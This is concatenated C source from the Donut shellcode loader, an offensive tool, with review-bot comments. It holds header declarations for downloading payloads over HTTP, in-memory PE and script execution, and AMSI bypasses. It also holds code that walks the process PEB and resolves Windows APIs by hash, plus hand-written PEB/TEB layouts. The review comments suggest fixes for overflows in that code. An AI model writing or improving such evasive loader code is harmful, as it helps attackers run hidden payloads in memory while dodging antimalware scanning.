75 #ifndef NT_SUCCESS
76 #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
77 #endif
78
79 #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
80
81 #ifndef FILE_OPEN
82 #define FILE_OPEN 0x00000001
83 #endif
84
85 #ifndef FILE_NON_DIRECTORY_FILE
86 #define FILE_NON_DIRECTORY_FILE 0x0000004
87 #endif
88
89 #if defined(_M_IX86) || defined(__i386__)
90 // return pointer to code in memory
91 char *get_pc(void);
92
93 // PC-relative addressing for x86 code. Similar to RVA2VA except using functions in payload
94 #define ADR(type, addr) (type)(get_pc() - ((ULONG_PTR)&get_pc - (ULONG_PTR)addr))
95 #else
96 #define ADR(type, addr) (type)(addr) // do nothing on 64-bit
97 #endif
98
99 void *Memset(void *ptr, int value, unsigned int num);
100 void *Memcpy(void *destination, const void *source, unsigned int num);
101 int Memcmp(const void *ptr1, const void *ptr2, unsigned int num);
102 int _strcmp(const char *s1, const char *s2);
103 NTSTATUS RtlUserThreadStart(LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter);
104
105 #if !defined(_MSC_VER)
106 #define memcmp(x,y,z) Memcmp(x,y,z)
107 #endif
108
109 #include "depack.h"
110 #include "peb.h" // Process Environment Block
111 #include "winapi.h" // Prototypes
112 #include "clr.h" // Common Language Runtime Interface
113
114 #include "donut.h"
115
116 #include "amsi.h" // Anti-malware Scan Interface
117 #include "activescript.h" // Interfaces for executing VBS/JS files
118 #include "wscript.h" // Interfaces to support WScript object
119 #include "bypass.h" // Structs and function definitions for needed by bypasses
120 #include "syscalls.h" // Structs and function definitions for syscalls
121
122 typedef struct {
123 IActiveScriptSite site;
124 IActiveScriptSiteWindow siteWnd;
125 IHost wscript;
126 PDONUT_INSTANCE inst; //
127 } MyIActiveScriptSite;
128
129 // internal structure
130 typedef struct _DONUT_ASSEMBLY {
131 ICLRMetaHost *icmh;
132 ICLRRuntimeInfo *icri;
133 ICorRuntimeHost *icrh;
134 IUnknown *iu;
135 AppDomain *ad;
136 Assembly *as;
137 Type *type;
138 MethodInfo *mi;
139 } DONUT_ASSEMBLY, *PDONUT_ASSEMBLY;
140
141 // Downloads a module from remote HTTP server into memory
142 BOOL DownloadFromHTTP(PDONUT_INSTANCE);
143
144 // .NET DLL/EXE
145 BOOL LoadAssembly(PDONUT_INSTANCE, PDONUT_MODULE, PDONUT_ASSEMBLY);
146 BOOL RunAssembly(PDONUT_INSTANCE, PDONUT_MODULE, PDONUT_ASSEMBLY);
147 VOID FreeAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
148
149 // In-Memory execution of native DLL
150 VOID RunPE(PDONUT_INSTANCE, PDONUT_MODULE);
151
152 // VBS / JS files
153 VOID RunScript(PDONUT_INSTANCE, PDONUT_MODULE);
154
155 LPVOID xGetProcAddressByHash(PDONUT_INSTANCE, ULONGLONG, ULONGLONG);
156
157 LPVOID xGetProcAddressByHash(PDONUT_INSTANCE inst, ULONG64 ulHash, ULONG64 ulIV);
158
159 LPVOID xGetLibAddress(PDONUT_INSTANCE inst, PCHAR dll_name);
160
161 LPVOID xGetProcAddress(PDONUT_INSTANCE inst, LPVOID base, PCHAR api_name, DWORD ordinal);
162
163 #endif
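Review bot: The `RVA2VA` macro (line 73) expands `base` and `rva` without parentheses, so an argument that is itself an expression can bind differently from what the caller wrote; the same holds for `addr` in the x86 `ADR` macro on line 94. I would write `#define RVA2VA(type, base, rva) ((type)((ULONG_PTR)(base) + (rva)))` and parenthesise `ADR` the same way. Separately, `xGetProcAddressByHash` is declared twice (lines 155 and 157), once with `ULONGLONG` and once with `ULONG64`; keeping only the prototype with named parameters stops the two from drifting apart.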
0 DonutLoader
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // find a DLL with a certain export, used by xGetProcAddress and FindExport
32 LPVOID FindReference(PDONUT_INSTANCE inst, LPVOID original_dll, PCHAR dll_name, PCHAR api_name) {
33 PPEB peb;
34 PPEB_LDR_DATA ldr;
35 PIMAGE_DOS_HEADER dos;
36 PIMAGE_NT_HEADERS nt;
37 PLDR_DATA_TABLE_ENTRY dte;
38 PIMAGE_DATA_DIRECTORY dir;
39 PIMAGE_EXPORT_DIRECTORY exp;
40 LPVOID addr = NULL, base;
41 DWORD rva, cnt;
42 PDWORD adr;
43 PDWORD sym;
44 PWORD ord;
45 PCHAR api;
46
47 peb = (PPEB)NtCurrentTeb()->ProcessEnvironmentBlock;
48 ldr = (PPEB_LDR_DATA)peb->Ldr;
49
50 // for each DLL loaded
51 for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
52 dte->DllBase != NULL && addr == NULL;
53 dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
54 {
55 base = dte->DllBase;
56 // if this is the dll with the reference, continue
57 if (base == original_dll) continue;
58
59 addr = xGetProcAddress(inst, base, api_name, 0);
60 }
61 if (addr == NULL) {
62 // we did not find the reference, use GetProcAddress
63 HMODULE hModule = xGetLibAddress(inst, dll_name);
64
65 if(hModule != NULL) {
66 DPRINT("Calling GetProcAddress(%s)", api_name);
67 addr = inst->api.GetProcAddress(hModule, api_name);
68 } else addr = NULL;
69 }
70
71 return addr;
72 }
73
74 // search for an export in a DLL
75 LPVOID xGetProcAddress(PDONUT_INSTANCE inst, LPVOID base, PCHAR api_name, DWORD ordinal) {
76 PIMAGE_DOS_HEADER dos;
77 PIMAGE_NT_HEADERS nt;
78 PIMAGE_DATA_DIRECTORY dir;
79 PIMAGE_EXPORT_DIRECTORY exp;
80 LPVOID addr = NULL;
81 DWORD rva, cnt;
82 PDWORD adr;
83 PDWORD sym;
84 PWORD ord;
85 PCHAR api;
86 CHAR dll_name[64];
87 CHAR new_api[64];
88 DWORD i;
89 PCHAR p;
90
91 if (base == NULL) return NULL;
92
93 dos = (PIMAGE_DOS_HEADER)base;
94 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
95 dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
96 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
97
98 // if no export table, return NULL
99 if (rva==0) return NULL;
100
101 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva);
102 adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions);
103 sym = RVA2VA(PDWORD,base, exp->AddressOfNames);
104 ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals);
105
106 if (api_name != NULL) {
107 // exported by name
108 cnt = exp->NumberOfNames;
109 // if no api names, return NULL
110 if (cnt==0) return NULL;
111
112 do {
113 api = RVA2VA(PCHAR, base, sym[cnt-1]);
114 // check if the export name matches the API we are looking for
115 if (!_strcmp(api, api_name)) {
116 // get the address of the API
117 addr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]);
118 }
119 } while (--cnt && addr == NULL);
120 } else {
121 // exported by ordinal
122 addr = RVA2VA(PVOID, base, adr[ordinal - exp->Base]);
123 }
124
125 // is this a forward reference?
126 if ((PBYTE)addr >= (PBYTE)exp &&
127 (PBYTE)addr < (PBYTE)exp +
128 dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
129 {
130 //DPRINT("%s is forwarded to %s", api_name, (char*)addr);
131
132 // copy DLL name to buffer
133 p=(char*)addr;
134
135 for(i=0; p[i] != 0 && i < sizeof(dll_name)-4; i++) {
136 dll_name[i] = p[i];
137 if(p[i] == '.') break;
138 }
139
140 dll_name[i+1] = 'd';
141 dll_name[i+2] = 'l';
142 dll_name[i+3] = 'l';
143 dll_name[i+4] = 0;
144
145 p += i + 1;
146
147 // copy API name to buffer
148 for(i=0; p[i] != 0 && i < sizeof(new_api)-1;i++) {
149 new_api[i] = p[i];
150 }
151 new_api[i] = 0;
152
153 addr = FindReference(inst, base, dll_name, new_api);
154 }
155 return addr;
156 }
157
158 // find a DLL by name, load it if not found
159 LPVOID xGetLibAddress(PDONUT_INSTANCE inst, PCHAR search) {
160 PPEB peb;
161 PPEB_LDR_DATA ldr;
162 PIMAGE_DOS_HEADER dos;
163 PIMAGE_NT_HEADERS nt;
164 PLDR_DATA_TABLE_ENTRY dte;
165 PIMAGE_EXPORT_DIRECTORY exp;
166 LPVOID addr = NULL, base;
167 DWORD rva;
168 PCHAR name;
169 CHAR dll_name[64];
170 DWORD i;
171
172 for(i=0; search[i] != 0 && i < 64; i++) {
173 dll_name[i] = search[i];
174 }
175 dll_name[i] = 0;
176 // make sure the name ends with '.dll'
177 if (dll_name[i-4] != '.') {
178 dll_name[i++] = '.';
179 dll_name[i++] = 'd';
180 dll_name[i++] = 'l';
181 dll_name[i++] = 'l';
182 dll_name[i++] = 0;
183 }
184
185 peb = (PPEB)NtCurrentTeb()->ProcessEnvironmentBlock;
186 ldr = (PPEB_LDR_DATA)peb->Ldr;
187
188 // for each DLL loaded
189 for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
190 dte->DllBase != NULL && addr == NULL;
191 dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
192 {
193 base = dte->DllBase;
194 dos = (PIMAGE_DOS_HEADER)base;
195 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
196 rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
197 if (rva == 0) continue;
198
199 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva);
200 name = RVA2VA(PCHAR, base, exp->Name);
201
202 if (stricmp(dll_name, name)) {
203 addr = base;
204 }
205 }
206 // if the DLL was not found, load it
207 if (addr == NULL) {
208 addr = inst->api.LoadLibraryA(dll_name);
209 DPRINT("Loaded %s at 0x%p", dll_name, addr);
210 }
211 return addr;
212 }
213
214 // locate address of API in export table using Maru hash function
215 LPVOID FindExport(PDONUT_INSTANCE inst, LPVOID base, ULONG64 api_hash, ULONG64 iv){
216 PIMAGE_DOS_HEADER dos;
217 PIMAGE_NT_HEADERS nt;
218 DWORD i, j, cnt, rva;
219 PIMAGE_DATA_DIRECTORY dir;
220 PIMAGE_EXPORT_DIRECTORY exp;
221 PDWORD adr;
222 PDWORD sym;
223 PWORD ord;
224 PCHAR api, dll, p;
225 LPVOID addr=NULL;
226 ULONG64 dll_hash;
227 CHAR buf[MAX_PATH], dll_name[64], api_name[128];
228
229 dos = (PIMAGE_DOS_HEADER)base;
230 nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
231 dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
232 rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
233
234 // if no export table, return NULL
235 if (rva==0) return NULL;
236
237 exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva);
238 cnt = exp->NumberOfNames;
239
240 // if no api names, return NULL
241 if (cnt==0) return NULL;
242
243 adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions);
244 sym = RVA2VA(PDWORD,base, exp->AddressOfNames);
245 ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals);
246 dll = RVA2VA(PCHAR, base, exp->Name);
247
248 // get hash of DLL string converted to lowercase
249 for(i=0;dll[i]!=0;i++) {
250 buf[i] = dll[i] | 0x20;
251 }
252 buf[i] = 0;
253 dll_hash = maru(buf, iv);
254
255 do {
256 // calculate hash of api string
257 api = RVA2VA(PCHAR, base, sym[cnt-1]);
258 // xor with DLL hash and compare with hash to find
259 if ((maru(api, iv) ^ dll_hash) == api_hash) {
260 // return address of function
261 addr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]);
262
263 // is this a forward reference?
264 if ((PBYTE)addr >= (PBYTE)exp &&
265 (PBYTE)addr < (PBYTE)exp +
266 dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
267 {
268 //DPRINT("%016llx is forwarded to %s", api_hash, (char*)addr);
269
270 // copy DLL name to buffer
271 p=(char*)addr;
272
273 for(i=0; p[i] != 0 && i < sizeof(dll_name)-4; i++) {
274 dll_name[i] = p[i];
275 if(p[i] == '.') break;
276 }
277
278 dll_name[i+1] = 'd';
279 dll_name[i+2] = 'l';
280 dll_name[i+3] = 'l';
281 dll_name[i+4] = 0;
282
283 p += i + 1;
284
285 // copy API name to buffer
286 for(i=0; p[i] != 0 && i < sizeof(api_name)-1;i++) {
287 api_name[i] = p[i];
288 }
289 api_name[i] = 0;
290
291 addr = FindReference(inst, base, dll_name, api_name);
292 }
293 return addr;
294 }
295 } while (--cnt && addr == NULL);
296
297 return addr;
298 }
299
300 // search all modules in the PEB for API
301 LPVOID xGetProcAddressByHash(PDONUT_INSTANCE inst, ULONG64 ulHash, ULONG64 ulIV) {
302 PPEB peb;
303 PPEB_LDR_DATA ldr;
304 PLDR_DATA_TABLE_ENTRY dte;
305 LPVOID addr = NULL;
306
307 peb = (PPEB)NtCurrentTeb()->ProcessEnvironmentBlock;
308 ldr = (PPEB_LDR_DATA)peb->Ldr;
309
310 // for each DLL loaded
311 for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
312 dte->DllBase != NULL && addr == NULL;
313 dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
314 {
315 // search the export table for api
316 addr = FindExport(inst, dte->DllBase, ulHash, ulIV);
317 }
318 return addr;
319 }
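Review bot: `xGetLibAddress` can write past `dll_name[64]`: the copy loop on line 172 stops at `i < 64`, so a 64-character `search` leaves `i == 64`, the terminator on line 175 is already one byte out of bounds, and the `.dll` append writes up to five more. Line 177 also reads `dll_name[i-4]` with an unsigned `i`, so a name shorter than four characters indexes far outside the buffer. Bounding the copy with `for(i=0; search[i] != 0 && i < sizeof(dll_name)-5; i++)` and testing `if (i < 4 || dll_name[i-4] != '.')` would close both. The forwarder-name copies in `xGetProcAddress` (lines 135-143) and `FindExport` (lines 273-281) have the same shape: when no `.` is found within the limit, `dll_name[i+4]` lands on index 64. The lowercase copy into `buf[MAX_PATH]` on lines 249-252 has no length bound at all.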
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef PEB_H
32 #define PEB_H
33
34 #include <windows.h>
35
36 typedef void *PPS_POST_PROCESS_INIT_ROUTINE;
37
38 typedef struct _LSA_UNICODE_STRING {
39 USHORT Length;
40 USHORT MaximumLength;
41 PWSTR Buffer;
42 } LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;
43
44 typedef struct _STRING {
45 USHORT Length;
46 USHORT MaximumLength;
47 PCHAR Buffer;
48 } STRING, *PSTRING, ANSI_STRING, *PANSI_STRING;
49
50 typedef struct _RTL_USER_PROCESS_PARAMETERS {
51 BYTE Reserved1[16];
52 PVOID Reserved2[10];
53 UNICODE_STRING ImagePathName;
54 UNICODE_STRING CommandLine;
55 } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
56
57 // PEB defined by rewolf
58 // http://blog.rewolf.pl/blog/?p=573
59 typedef struct _PEB_LDR_DATA {
60 ULONG Length;
61 BOOL Initialized;
62 LPVOID SsHandle;
63 LIST_ENTRY InLoadOrderModuleList;
64 LIST_ENTRY InMemoryOrderModuleList;
65 LIST_ENTRY InInitializationOrderModuleList;
66 } PEB_LDR_DATA, *PPEB_LDR_DATA;
67
68 typedef struct _LDR_DATA_TABLE_ENTRY
69 {
70 LIST_ENTRY InLoadOrderLinks;
71 LIST_ENTRY InMemoryOrderLinks;
72 LIST_ENTRY InInitializationOrderLinks;
73 LPVOID DllBase;
74 LPVOID EntryPoint;
75 ULONG SizeOfImage;
76 UNICODE_STRING FullDllName;
77 UNICODE_STRING BaseDllName;
78 } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
79
80 typedef struct _PEB {
81 BYTE InheritedAddressSpace;
82 BYTE ReadImageFileExecOptions;
83 BYTE BeingDebugged;
84 BYTE _SYSTEM_DEPENDENT_01;
85
86 LPVOID Mutant;
87 LPVOID ImageBaseAddress;
88
89 PPEB_LDR_DATA Ldr;
90 PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
91 LPVOID SubSystemData;
92 LPVOID ProcessHeap;
93 LPVOID FastPebLock;
94 LPVOID _SYSTEM_DEPENDENT_02;
95 LPVOID _SYSTEM_DEPENDENT_03;
96 LPVOID _SYSTEM_DEPENDENT_04;
97 union {
98 LPVOID KernelCallbackTable;
99 LPVOID UserSharedInfoPtr;
100 };
101 DWORD SystemReserved;
102 DWORD _SYSTEM_DEPENDENT_05;
103 LPVOID _SYSTEM_DEPENDENT_06;
104 LPVOID TlsExpansionCounter;
105 LPVOID TlsBitmap;
106 DWORD TlsBitmapBits[2];
107 LPVOID ReadOnlySharedMemoryBase;
108 LPVOID _SYSTEM_DEPENDENT_07;
109 LPVOID ReadOnlyStaticServerData;
110 LPVOID AnsiCodePageData;
111 LPVOID OemCodePageData;
112 LPVOID UnicodeCaseTableData;
113 DWORD NumberOfProcessors;
114 union
115 {
116 DWORD NtGlobalFlag;
117 LPVOID dummy02;
118 };
119 LARGE_INTEGER CriticalSectionTimeout;
120 LPVOID HeapSegmentReserve;
121 LPVOID HeapSegmentCommit;
122 LPVOID HeapDeCommitTotalFreeThreshold;
123 LPVOID HeapDeCommitFreeBlockThreshold;
124 DWORD NumberOfHeaps;
125 DWORD MaximumNumberOfHeaps;
126 LPVOID ProcessHeaps;
127 LPVOID GdiSharedHandleTable;
128 LPVOID ProcessStarterHelper;
129 LPVOID GdiDCAttributeList;
130 LPVOID LoaderLock;
131 DWORD OSMajorVersion;
132 DWORD OSMinorVersion;
133 WORD OSBuildNumber;
134 WORD OSCSDVersion;
135 DWORD OSPlatformId;
136 DWORD ImageSubsystem;
137 DWORD ImageSubsystemMajorVersion;
138 LPVOID ImageSubsystemMinorVersion;
139 union
140 {
141 LPVOID ImageProcessAffinityMask;
142 LPVOID ActiveProcessAffinityMask;
143 };
144 #ifdef _WIN64
145 LPVOID GdiHandleBuffer[64];
146 #else
147 LPVOID GdiHandleBuffer[32];
148 #endif
149 LPVOID PostProcessInitRoutine;
150 LPVOID TlsExpansionBitmap;
151 DWORD TlsExpansionBitmapBits[32];
152 LPVOID SessionId;
153 ULARGE_INTEGER AppCompatFlags;
154 ULARGE_INTEGER AppCompatFlagsUser;
155 LPVOID pShimData;
156 LPVOID AppCompatInfo;
157 PUNICODE_STRING CSDVersion;
158 LPVOID ActivationContextData;
159 LPVOID ProcessAssemblyStorageMap;
160 LPVOID SystemDefaultActivationContextData;
161 LPVOID SystemAssemblyStorageMap;
162 LPVOID MinimumStackCommit;
163 } PEB, *PPEB;
164
165
166 typedef struct _CLIENT_ID {
167 HANDLE UniqueProcess;
168 HANDLE UniqueThread;
169 } CLIENT_ID, *PCLIENT_ID;
170
171 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
172 typedef struct _ACTIVATION_CONTEXT *PACTIVATION_CONTEXT;
173 typedef struct _TEB_ACTIVE_FRAME *PTEB_ACTIVE_FRAME;
174 typedef struct _TEB_ACTIVE_FRAME_CONTEXT *PTEB_ACTIVE_FRAME_CONTEXT;
175
176 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
177 PRTL_ACTIVATION_CONTEXT_STACK_FRAME Previous;
178 PACTIVATION_CONTEXT *ActivationContext;
179 ULONG Flags;
180 } RTL_ACTIVATION_CONTEXT_STACK_FRAME, *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
181
182 typedef struct _ACTIVATION_CONTEXT_STACK
183 {
184 PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
185 LIST_ENTRY FrameListCache;
186 ULONG Flags;
187 ULONG NextCookieSequenceNumber;
188 ULONG StackId;
189 } ACTIVATION_CONTEXT_STACK, *PACTIVATION_CONTEXT_STACK;
190 #define GDI_BATCH_BUFFER_SIZE 310
191
192 typedef struct _GDI_TEB_BATCH
193 {
194 ULONG Offset;
195 ULONG_PTR HDC;
196 ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
197 } GDI_TEB_BATCH, *PGDI_TEB_BATCH;
198
199 typedef struct _TEB_ACTIVE_FRAME_CONTEXT
200 {
201 ULONG Flags;
202 PSTR FrameName;
203 } TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;
204
205 typedef struct _TEB_ACTIVE_FRAME
206 {
207 ULONG Flags;
208 struct _TEB_ACTIVE_FRAME *Previous;
209 PTEB_ACTIVE_FRAME_CONTEXT Context;
210 } TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;
211
212 #if !defined(_MSC_VER) && !defined(_WINNT_)
213 typedef struct _PROCESSOR_NUMBER {
214 USHORT Group;
215 UCHAR Number;
216 UCHAR Reserved;
217 } PROCESSOR_NUMBER, *PPROCESSOR_NUMBER;
218 #endif
219
220 typedef struct _TEB
221 {
222 NT_TIB NtTib;
223
224 PVOID EnvironmentPointer;
225 CLIENT_ID ClientId;
226 PVOID ActiveRpcHandle;
227 PVOID ThreadLocalStoragePointer;
228 PPEB ProcessEnvironmentBlock;
229
230 ULONG LastErrorValue;
231 ULONG CountOfOwnedCriticalSections;
232 PVOID CsrClientThread;
233 PVOID Win32ThreadInfo;
234 ULONG User32Reserved[26];
235 ULONG UserReserved[5];
236 PVOID WOW32Reserved;
237 LCID CurrentLocale;
238 ULONG FpSoftwareStatusRegister;
239 PVOID SystemReserved1[54];
240 NTSTATUS ExceptionCode;
241 PVOID ActivationContextStackPointer;
242 #ifdef _M_X64
243 UCHAR SpareBytes[24];
244 #else
245 UCHAR SpareBytes[36];
246 #endif
247 ULONG TxFsContext;
248
249 GDI_TEB_BATCH GdiTebBatch;
250 CLIENT_ID RealClientId;
251 HANDLE GdiCachedProcessHandle;
252 ULONG GdiClientPID;
253 ULONG GdiClientTID;
254 PVOID GdiThreadLocalInfo;
255 ULONG_PTR Win32ClientInfo[62];
256 PVOID glDispatchTable[233];
257 ULONG_PTR glReserved1[29];
258 PVOID glReserved2;
259 PVOID glSectionInfo;
260 PVOID glSection;
261 PVOID glTable;
262 PVOID glCurrentRC;
263 PVOID glContext;
264
265 NTSTATUS LastStatusValue;
266 UNICODE_STRING StaticUnicodeString;
267 WCHAR StaticUnicodeBuffer[261];
268
269 PVOID DeallocationStack;
270 PVOID TlsSlots[64];
271 LIST_ENTRY TlsLinks;
272
273 PVOID Vdm;
274 PVOID ReservedForNtRpc;
275 PVOID DbgSsReserved[2];
276
277 ULONG HardErrorMode;
278 #ifdef _M_X64
279 PVOID Instrumentation[11];
280 #else
281 PVOID Instrumentation[9];
282 #endif
283 GUID ActivityId;
284
285 PVOID SubProcessTag;
286 PVOID EtwLocalData;
287 PVOID EtwTraceData;
288 PVOID WinSockData;
289 ULONG GdiBatchCount;
290
291 union
292 {
293 PROCESSOR_NUMBER CurrentIdealProcessor;
294 ULONG IdealProcessorValue;
295 struct
296 {
297 UCHAR ReservedPad0;
298 UCHAR ReservedPad1;
299 UCHAR ReservedPad2;
300 UCHAR IdealProcessor;
301 };
302 };
303
304 ULONG GuaranteedStackBytes;
305 PVOID ReservedForPerf;
306 PVOID ReservedForOle;
307 ULONG WaitingOnLoaderLock;
308 PVOID SavedPriorityState;
309 ULONG_PTR SoftPatchPtr1;
310 PVOID ThreadPoolData;
311 PVOID *TlsExpansionSlots;
312 #ifdef _M_X64
313 PVOID DeallocationBStore;
314 PVOID BStoreLimit;
315 #endif
316 ULONG MuiGeneration;
317 ULONG IsImpersonating;
318 PVOID NlsCache;
319 PVOID pShimData;
320 ULONG HeapVirtualAffinity;
321 HANDLE CurrentTransactionHandle;
322 PTEB_ACTIVE_FRAME ActiveFrame;
323 PVOID FlsData;
324
325 PVOID PreferredLanguages;
326 PVOID UserPrefLanguages;
327 PVOID MergedPrefLanguages;
328 ULONG MuiImpersonation;
329
330 union
331 {
332 USHORT CrossTebFlags;
333 USHORT SpareCrossTebBits : 16;
334 };
335 union
336 {
337 USHORT SameTebFlags;
338 struct
339 {
340 USHORT SafeThunkCall : 1;
341 USHORT InDebugPrint : 1;
342 USHORT HasFiberData : 1;
343 USHORT SkipThreadAttach : 1;
344 USHORT WerInShipAssertCode : 1;
345 USHORT RanProcessInit : 1;
346 USHORT ClonedThread : 1;
347 USHORT SuppressDebugMsg : 1;
348 USHORT DisableUserStackWalk : 1;
349 USHORT RtlExceptionAttached : 1;
350 USHORT InitialThread : 1;
351 USHORT SessionAware : 1;
352 USHORT SpareSameTebBits : 4;
353 };
354 };
355
356 PVOID TxnScopeEnterCallback;
357 PVOID TxnScopeExitCallback;
358 PVOID TxnScopeContext;
359 ULONG LockCount;
360 ULONG SpareUlong0;
361 PVOID ResourceRetValue;
362 PVOID ReservedForWdf;
363 } TEB, *PTEB;
364
365 #endif
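Review bot: The architecture guards in these hand-written layouts are inconsistent: `PEB` switches `GdiHandleBuffer` on `_WIN64` (line 144), while `TEB` switches `SpareBytes`, `Instrumentation` and `DeallocationBStore` on `_M_X64` (lines 242, 278, 312). loader.h has a `!defined(_MSC_VER)` build path, and whether `_M_X64` is defined there presumably depends on the toolchain's headers, so a 64-bit build could silently get the 32-bit field sizes. Using `_WIN64` throughout would remove that dependency. A header comment such as `// layout checked against: <Windows builds>` would also help, since these structures are undocumented and a mismatch only shows up as a bad read through `NtCurrentTeb()->ProcessEnvironmentBlock`.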
0
1 /**
2 Copyright © 2016-2019 Odzhan. All Rights Reserved.
3
4 Redistribution and use in source and binary forms, with or without
5 modification, are permitted provided that the following conditions are
6 met:
7
8 1. Redistributions of source code must retain the above copyright
9 notice, this list of conditions and the following disclaimer.
10
11 2. Redistributions in binary form must reproduce the above copyright
12 notice, this list of conditions and the following disclaimer in the
13 documentation and/or other materials provided with the distribution.
14
15 3. The name of the author may not be used to endorse or promote products
16 derived from this software without specific prior written permission.
17
18 THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
19 IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
20 WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
21 DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
22 INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
